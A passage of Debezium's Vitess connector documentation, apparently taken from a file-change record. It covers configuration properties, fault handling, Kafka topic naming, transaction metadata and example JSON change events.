4MiB\n\n|[[vitess-property-column-propagate-source-type]]<<vitess-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\n|[[vitess-property-datatype-propagate-source-type]]<<vitess-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\nSee xref:vitess-data-types[how Vitess connectors map data types] for the list of Vitess-specific data type names.\n\n\n|===\n\n[id=\"vitess-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. The Vitess connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} Vitess connectors handle faults and problems\n[[vitess-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully then {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen then the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\n\n[id=\"vitess-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to Vitess by using the specified connection parameters.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the Vitess problem, restart the connector.\n\n[id=\"vitess-becomes-unavailable\"]\n=== Vitess becomes unavailable\n\nWhen the connector is running, the Vitses server (VTGate) that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe Vitess connector externally stores the last processed offset in the form of a Vitess VGTID. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset.\n\n[id=\"invalid-column-name-error\"]\n=== Invalid column name error\n\nThis error happens very rarely. If you receive an error with the message `Illegal prefix '@' for column: x, from schema: y, table: z`, and your table doesn't have such a column, it is a Vitess vstream link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[bug] that is caused by column renaming or column type change. It is a transient error. You can restart the connector after a small backoff and it should resolve automatically.\n\n[id=\"vitess-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n[id=\"vitess-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, Vitess connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the Vitess server's time of the event, the position in the binlog where the transaction changes were written. Consumers can keep track of this information, especially the VGTID, to determine whether an event is a duplicate.\n\n[id=\"vitess-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"vitess-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the Vitess binlog. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources a Kafka Connect connector can also handle very large numbers of database change events. Because of this, after being stopped for a while, when a {prodname} connector restarts, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in Vitess.\n\n[id=\"limitations-with-earlier-vitess-versions\"]\n=== Limitations with earlier Vitess versions\n\n.Vitess 8.0.0\n\n* Due to a minor Vitess padding issue (which is fixed in Vitess 9.0.0), decimal values with a precision that is greater than or equal to 13 will cause extra whitespaces in front of the number. E.g. if the column type is `decimal(13,4)` in the table definition, the value `-1.2300` becomes `\"- 1.2300\"`, and the value `1.2300` becomes `\" 1.2300\"`.\n* Does not support the `JSON` column type.\n* VStream 8.0.0 doesn't provide additional metadata of permitted values for `ENUM` columns.\nTherefore, the Connector does not support the `ENUM` column type.\nThe index number (1-based) will be emitted instead of the enumeration value.\nE.g. `\"3\"` will be emitted as the value instead of `\"L\"` if the `ENUM` definition is `enum('S','M','L')`.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-vitess\"]\n= {prodname} connector for Vitess\n:context: vitess\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s Vitess connector captures row-level changes in the shards of a Vitess link:https:\/\/vitess.io\/docs\/concepts\/keyspace\/[keyspace].\nFor information about the Vitess versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\n\nThe connector does not support snapshot feature at the moment. The first time it connects to a Vitess cluster, it starts from the current VGTID location of the keyspace and continuously captures row-level changes that insert, update, and delete database content and that were committed to a Vitess keyspace. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. Applications and services consume data change event records from that topic.\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Vitess connector\n\/\/ ModuleID: overview-of-debezium-vitess-connector\n[[vitess-overview]]\n== Overview\n\nVitess's link:https:\/\/vitess.io\/docs\/concepts\/vstream\/[VStream] feature was introduced in version 4.0. It is a change event subscription service that provides equivalent information to the MySQL binary logs from the underlying MySQL shards of the Vitess cluster. An user can subscribe to multiple shards in a keyspace, making it a convenient tool to feed downstream CDC processes.\n\nTo read and process database changes, the Vitess connector subscribes to link:https:\/\/vitess.io\/docs\/concepts\/vtgate\/[VTGate]'s VStream gRPC service. VTGate is a lightweight, stateless gRPC server, which is part of the Vitess cluster setup.\n\nThe connector gives you the flexibility to choose to subscribe to the `MASTER` nodes, or to the `REPLICA` nodes for change events.\n\nThe connector produces a change event for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nThe connector is tolerant of failures. As the connector reads changes and produces events, it records the VGTID position for each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the WAL where it last left off.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-work\n\/\/ Title: How {prodname} Vitess connectors work\n[[how-the-vitess-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Vitess connector, it is helpful to understand how the connector streams change events, determines Kafka topic names, and uses metadata.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-vitess-connectors-stream-change-event-records\n\/\/ Title: How {prodname} Vitess connectors stream change event records\n[[vitess-streaming-changes]]\n=== Streaming changes\n\nThe Vitess connector spends all its time streaming changes from the VTGate's VStream gRPC service to which it is subscribed. The client receives changes from VStream as they are committed in the underlying MySQL server's binlog at certain positions, which are referred to as VGTID.\n\nThe VGTID in Vitess is the equivalent of GTID in MySQL, it describes the position in the VStream in which a change event happens. Typically, A VGTID has multiple shard GTIDs, each shard GTID is a tuple of `(Keyspace, Shard, GTID)`, which describes the GTID position of a given shard.\n\nWhen subscribing to a VStream service, the connector needs to provide a VGTID and a link:https:\/\/vitess.io\/docs\/concepts\/tablet\/#tablet-types[Tablet Type] (e.g. `MASTER`, `REPLICA`). The VGTID describes the position from which VStream should starts sending change events; the Tablet type describes which underlying MySQL instance (master or replica) in each shard do we read change events from.\n\nThe first time the connector connects to a Vitess cluster, it gets the current VGTID from a Vitess component called link:https:\/\/vitess.io\/docs\/concepts\/vtctld\/[VTCtld] and provides the current VGTID to VStream.\n\nThe {prodname} Vitess connector acts as a gRPC client of VStream. When the connector receives changes it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the VGTID of the event. The Vitess connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the Vitess connector, the VGTID recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. When the connector restarts, it sends a request to VStream to send the events starting just after that position.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-vitess-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Vitess change event records\n[[vitess-topic-names]]\n=== Topics names\n\nThe Vitess connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. By default, the Kafka topic name is _serverName_._keyspaceName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _keyspaceName_ is the name of the keyspace (a.k.a. database) where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a Vitess installation that has an `commerce` keyspace that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. Regardless of how many shards the keyspace has, the connector would stream records to these four Kafka topics:\n\n* `fulfillment.commerce.products`\n* `fulfillment.commerce.products_on_hand`\n* `fulfillment.commerce.customers`\n* `fulfillment.commerce.orders`\n\n[[vitess-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\n{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.\nTransaction boundary events contain the following fields:\n\n`status`:: `BEGIN` or `END`.\n`id`:: String representation of the unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements.\nthat indicates the number of events that the connector emits for changes that originate from a data collection.\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n \"event_count\": 1,\n \"data_collections\": [\n {\n \"data_collection\": \"test_unsharded_keyspace.my_seq\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:vitess-property-transaction-topic[`transaction.topic`] option,\nthe connector emits transaction events to the xref:vitess-property-database-server-name[`_<database.server.name>_`]`.transaction` topic.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": 1637988245467,\n \"transaction\": {\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-68\\\"}]\",\n \"total_order\": 1,\n \"data_collection_order\": 1\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Vitess connector data change events\n[[vitess-events]]\n== Data change events\n\nThe {prodname} Vitess connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the first single-column unique key if the table does not have a primary key, for the table that was changed. Multi-column unique key is not supported. +\n +\nIt is possible to override the table's primary key by setting the xref:vitess-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nBy default behavior is that the connector streams change event records to xref:vitess-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe Vitess connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n[IMPORTANT]\n====\nThe connector doesn't allow to name columns with the `@` prefix at the moment. For example, `age` is a valid column name, and `@age` is not. The reason is that Vitess vstreamer has a bug that would send events with anonymized column names (e.g. column name `age` is anonymized to `@1`). There's no easy way to differentiate between a legit column name with the `@` prefix, and the Vitess bug. See more discussion link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[here].\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-vitess-change-events\n\/\/ Title: About keys in {prodname} Vitess change events\n[[vitess-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created.\n\nConsider a `customers` table defined in the `commerce` keyspace and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INT NOT NULL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `Vitess_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"Vitess_server.commerce.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"name\": \"id\",\n \"index\": \"0\",\n \"schema\": {\n \"type\": \"INT32\",\n \"optional\": \"false\"\n }\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1\"\n },\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`Vitess_server.commerce.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._keyspace-name_._table-name_.`Key`. In this example: +\n\n* `Vitess_server` is the name of the connector that generated this event. +\n* `commerce` is the keyspace that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary, then the change event's key is null. The rows in a table without a primary key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-vitess-change-events\n\/\/ Title: About values in {prodname} Vitess change events\n[[vitess-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INT NOT NULL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe emitted events for `UPDATE` and `DELETE` operations contain the previous values of all columns in the table.\n\n\/\/ Type: continue\n[[vitess-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"vgtid\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.vitess.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"Vitess_server.commerce.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-45\\\"}]\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`Vitess_server.commerce.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._keyspaceName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the xref:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.vitess.Source` is the schema for the payload's `source` field. This schema is specific to the Vitess connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`Vitess_server.commerce.customers.Envelope` is the schema for the overall structure of the payload, where `Vitess_server` is the connector name, `commerce` is the keyspace, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database binlog\n* Timestamp for when the change was made in the database\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n\/\/ Type: continue\n[[vitess-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": null,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-46\\\"}]\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that contains all values of all columns that were in the row before the database commit.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a xref:vitess-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n[[vitess-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 